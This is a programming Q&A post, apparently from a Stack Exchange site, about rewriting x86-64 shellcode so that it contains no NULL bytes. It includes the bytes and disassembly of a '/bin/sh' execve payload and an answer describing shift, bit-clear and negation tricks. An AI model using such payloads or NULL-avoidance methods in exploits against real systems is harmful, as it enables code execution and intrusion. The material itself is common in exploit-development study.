# Writing ```movabs``` instruction as NULL-free shellcode

Tags: shellcode

I've seen ways of rewriting '''mov''' instructions using '''xor''' and '''inc''' to produce NULL-free shellcode but I have had trouble extending those methods to the '''movabs''' instruction.

How can I rewrite the following as NULL-free shellcode?:

```
Raw Bytes:
31F648BB2F62696E2F7368005653545F6A3B5831D20F05

Python Escaped:
"\x31\xF6\x48\xBB\x2F\x62\x69\x6E\x2F\x73\x68\x00\x56\x53\x54\x5F\x6A\x3B\x58\x31\xD2\x0F\x05"

Disassembly:

0:  31 f6                   xor    esi,esi

2:  48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f6e69622f
9:  73 68 00

c:  56                      push   rsi

d:  53                      push   rbx

e:  54                      push   rsp

f:  5f                      pop    rdi

10: 6a 3b                   push   0x3b
```

If you can say anything about the general process for thinking about rewriting shellcode as NULL-free (for arbitrary instructions), I would also be grateful.

Answer (score 1):

Your issue is that the literal contains a 0 in the upper byte. Fortunately, that's easy to remedy: shift the literal. Just write any garbage you want in the *lower* byte, and then do `shr rax, 8` to fix it up, which will discard the lower byte and insert a zero above.

As for the general process, there's a few methods that will functionally *always* work (e.g., writing a 0x40 byte instead of a 0x00 and then using `btc rax, <bit position>` to clear the excess bit you set), but it's often a matter of finding the simplest way you can express the constant. For instance, you could have also written the constant *negated* to `rax` and then used `neg rax` (or `not rax`) to undo the negation, because the negated constant doesn't have any 0x00 bytes.